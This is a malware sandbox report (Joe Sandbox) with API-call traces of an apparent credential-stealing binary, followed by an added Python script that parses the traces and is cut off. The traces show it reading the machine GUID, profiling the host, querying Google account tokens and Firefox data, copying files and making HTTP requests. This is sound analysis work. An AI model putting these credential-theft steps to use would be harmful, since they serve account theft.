• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID: Stable\$firefox
• API String ID: 3722407311-3160656979
• Opcode ID: 07aa222e2da21d717e458fe990cbe4ad6f9b61068dc6b628ebe64ffb48780d67
• Instruction ID: e02f75867bf234bc9478fe1eac23c1c1badb78ebb1894b9a718753c81ac5af06
• Opcode Fuzzy Hash: 07aa222e2da21d717e458fe990cbe4ad6f9b61068dc6b628ebe64ffb48780d67
• Instruction Fuzzy Hash: 91A16071900109ABCF26FBB4DC96EEE7BF9BB11354F804515F8019F192EE35AA18C692
APIs
• memset.MSVCRT ref: 0034EF53
• RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 0034EF6F
• RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0034EF8E
• RegCloseKey.ADVAPI32(?), ref: 0034EF97
• CharToOemA.USER32(?,?), ref: 0034EFAB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: CharCloseOpenQueryValuememset
• String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
• API String ID: 2391366103-1211650757
• Opcode ID: 538fe9c21ab1e6a25b2d13eea47a6aac124adf3f42ddd4eed7b39ce7f2d37fd7
• Instruction ID: 7f80f998f819d42b74572791bc1c1e57462f17338f5a7bb17b1bb963c7e6caab
• Opcode Fuzzy Hash: 538fe9c21ab1e6a25b2d13eea47a6aac124adf3f42ddd4eed7b39ce7f2d37fd7
• Instruction Fuzzy Hash: 1B014FB684421DBFEB11DB90DC89EEEB77CEB14345F0041A1B545E2061EAB09FC89B60
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• lstrlenA.KERNEL32(00000000), ref: 00348253
  • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
• StrStrA.SHLWAPI(00000000,AccountId), ref: 00348278
• lstrlenA.KERNEL32(00000000), ref: 0034833A
• lstrlenA.KERNEL32(00000000), ref: 0034834E
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 00346BB0: memcmp.MSVCRT(?,v10,00000003,0035E264,0035E266,?), ref: 00346BCF
                                                                                                                                                                                        • Part of subcall function 00346BB0: memset.MSVCRT ref: 00346C00
                                                                                                                                                                                        • Part of subcall function 00346BB0: LocalAlloc.KERNEL32(00000040,?), ref: 00346C35
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                      • String ID: AccountId$GoogleAccounts$SELECT service, encrypted_token FROM token_service$f5
                                                                                                                                                                                      • API String ID: 2910778473-512823432
                                                                                                                                                                                      • Opcode ID: bcd8c5af8446a1f160d15d9219dd6e8629c2521463d2b75655e537952cb44e55
                                                                                                                                                                                      • Instruction ID: 1cc6dbaa0683cc6c7e5c17366fd13c1b5f1782277e5464bc20a6514d0998496b
                                                                                                                                                                                      • Opcode Fuzzy Hash: bcd8c5af8446a1f160d15d9219dd6e8629c2521463d2b75655e537952cb44e55
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5091D772804108AADF06FBE4DD96CEE77B8BF25315F550565F402BE0A1EF24BA09CB61
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,00000104,?,00000104,?,00000104,?,00000104,?), ref: 00353EDE
                                                                                                                                                                                        • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00353F00
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00353F1C
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00353F30
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00353F43
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00353F57
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00353F6A
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
                                                                                                                                                                                        • Part of subcall function 00353C2D: GetProcessHeap.KERNEL32(00000000,0098967F,00000104), ref: 00353C3E
                                                                                                                                                                                        • Part of subcall function 00353C2D: HeapAlloc.KERNEL32(00000000), ref: 00353C45
                                                                                                                                                                                        • Part of subcall function 00353C2D: wsprintfA.USER32 ref: 00353C5D
                                                                                                                                                                                        • Part of subcall function 00353C2D: FindFirstFileA.KERNEL32(?,?), ref: 00353C74
                                                                                                                                                                                        • Part of subcall function 00353C2D: StrCmpCA.SHLWAPI(?,0035E258), ref: 00353C91
                                                                                                                                                                                        • Part of subcall function 00353C2D: StrCmpCA.SHLWAPI(?,0035E254), ref: 00353CAB
                                                                                                                                                                                        • Part of subcall function 00353C2D: wsprintfA.USER32 ref: 00353CCF
                                                                                                                                                                                        • Part of subcall function 00353C2D: CopyFileA.KERNEL32(?,00000000,00000001), ref: 00353D72
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3853466361-0
                                                                                                                                                                                      • Opcode ID: 1ce574388ccbe2dd181760fab855a78a286530b17cb9d9389d9021687e0d7f08
                                                                                                                                                                                      • Instruction ID: 04e77f0d869ba9d80c07993f8989015026c226c1a260c67b07344f7f1eaa43eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce574388ccbe2dd181760fab855a78a286530b17cb9d9389d9021687e0d7f08
                                                                                                                                                                                      • Instruction Fuzzy Hash: EA31A0B2C0011DABCF12EBF0DD49DCE77BCAF49305F0445E2B509EA055EA34A7898BA5
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034507A
                                                                                                                                                                                        • Part of subcall function 0034502A: StrCmpCA.SHLWAPI(?), ref: 0034508E
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003450B1
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 003450E7
                                                                                                                                                                                        • Part of subcall function 0034502A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0034510B
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00345116
                                                                                                                                                                                        • Part of subcall function 0034502A: HttpQueryInfoA.WININET(00000000,00000013,?,00000000), ref: 00345134
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00351565
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00351578
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 0035159F
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 003515B4
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 003515CF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
• String ID: ERROR
• API String ID: 4174444224-2861137601
• Opcode ID: 7b43e08e2e6e362704c9e284de2831006bd4caf5f4c6c66ff58a5f4974eba01b
• Instruction ID: a055d10b19a0498a24d00d503ca2b4cfda373b7c04c3607c73caa84d8837f8f4
• Opcode Fuzzy Hash: 7b43e08e2e6e362704c9e284de2831006bd4caf5f4c6c66ff58a5f4974eba01b
• Instruction Fuzzy Hash: 84215E319041046BCB27FFB4DC96DEE37A8BE42394B504565F8069E162FF30EB09C690
APIs
• ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
• ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
• ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
• lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
• InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: CrackInternetlstrlen
• String ID: ERROR
• API String ID: 1274457161-2861137601
• Opcode ID: 2360bb456d0eb11e73010cc8b6856dc6ab39d27e0d4086bc1a03d386a5316723
• Instruction ID: d11a060bd23594cd5d59baab42a1986d2fb0ca8191c9eba3ba280445a168ef34
• Opcode Fuzzy Hash: 2360bb456d0eb11e73010cc8b6856dc6ab39d27e0d4086bc1a03d386a5316723
• Instruction Fuzzy Hash: 90115E71C00608AADF15AFA4EC45ADE7BB8AF05330F108226F925EB2E1DB749705CB90
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory), ref: 0034F1D2
• HeapAlloc.KERNEL32(00000000,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory,00000000,?), ref: 0034F1D9
• RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?), ref: 0034F207
• RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000), ref: 0034F223
• RegCloseKey.ADVAPI32(?,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory,00000000,?), ref: 0034F22C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: Windows 11
• API String ID: 3466090806-2517555085
• Opcode ID: 6236015f1d6638db699e269849ad638d36c527a79949e449feb02d2c51758df5
• Instruction ID: 22325c63e117edd3c61d709ae010c91e56edb196efbeedeba3a15fa43e240e8e
• Opcode Fuzzy Hash: 6236015f1d6638db699e269849ad638d36c527a79949e449feb02d2c51758df5
• Instruction Fuzzy Hash: D3F04F79200204FFEB119BE1DC0AFAE7ABDFB84740F144024F606EA1A0D6B0A9419B20
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00361678), ref: 0034EB52
• HeapAlloc.KERNEL32(00000000), ref: 0034EB59
• GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0034EB79
• wsprintfA.USER32 ref: 0034EB9F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
• String ID: %d MB$@
• API String ID: 3644086013-3474575989
• Opcode ID: 2c19e5bed5d6cfe42f70aa1d669a75eaeec9cf231191071779a20912d425db51
• Instruction ID: aea6322749fc3cd926e73e64b3cbd04fc9f89d431044b3b53ec23e17251b725b
• Opcode Fuzzy Hash: 2c19e5bed5d6cfe42f70aa1d669a75eaeec9cf231191071779a20912d425db51
• Instruction Fuzzy Hash: FFF012B5604108ABE740DBE4DC5AF7E77BDF744700F444428F706E6191D6B498428A65
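The three function entries above (URL cracking via InternetCrackUrlA, a registry read under HKLM 0x80000002 with access mask 0x00020119 that yields the "Windows 11" string, and GlobalMemoryStatusEx formatted as "%d MB") are the sample's host-profiling routine as the sandbox recorded it. The Python below is an added example, not part of the Joe Sandbox report or of the analysed binary: it parses trace lines in the report's `api.MODULE(args), ref: ADDR` format, decodes the registry hive and REGSAM access mask, and flags the profiling calls. The sample lines are copied from the API lists on this page (including the RegQueryValueExA on CurrentBuildNumber that follows); the assumption that the samDesired mask is located by its bit pattern rather than by stack slot is the example's own, because the sandbox prints unresolved pointer slots as `00000000` or `?` and the slots do not line up with the prototype.

```python
"""Parse Joe Sandbox 'APIs' trace lines and decode the registry / memory
fingerprinting calls they record.  Added example; not part of the report."""
import re
from dataclasses import dataclass

# Constructed sample: API-trace lines copied from the function entries on this page.
SAMPLE_TRACE = """\
• lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
• InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
• GetProcessHeap.KERNEL32(00000000,00000104,00361678), ref: 0034EB52
• HeapAlloc.KERNEL32(00000000), ref: 0034EB59
• GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0034EB79
• wsprintfA.USER32 ref: 0034EB9F
• RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ), ref: 0034E7A2
• RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000), ref: 0034E7BD
• RegCloseKey.ADVAPI32(?,?,?,?,0034E7DB,0034F1E6,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678), ref: 0034E7C6
"""

# "api.MODULE(args), ref: ADDR".  The argument list (with its trailing comma) is
# optional, as the wsprintfA line shows; API names may contain ? _ @ (decorated C++).
_LINE = re.compile(
    r"^\s*•?\s*(?P<api>[^\s.(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\)\s*,)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # raw stack tokens as the sandbox printed them ('?' = unresolved)
    ref: int     # call-site address inside the dumped image

def parse_trace(text):
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised trace line: {line!r}")
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls

def _hex(tok):
    """Hex stack token -> int; None for '?' and for resolved strings like 'ERROR'."""
    try:
        return int(tok, 16)
    except ValueError:
        return None

_HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
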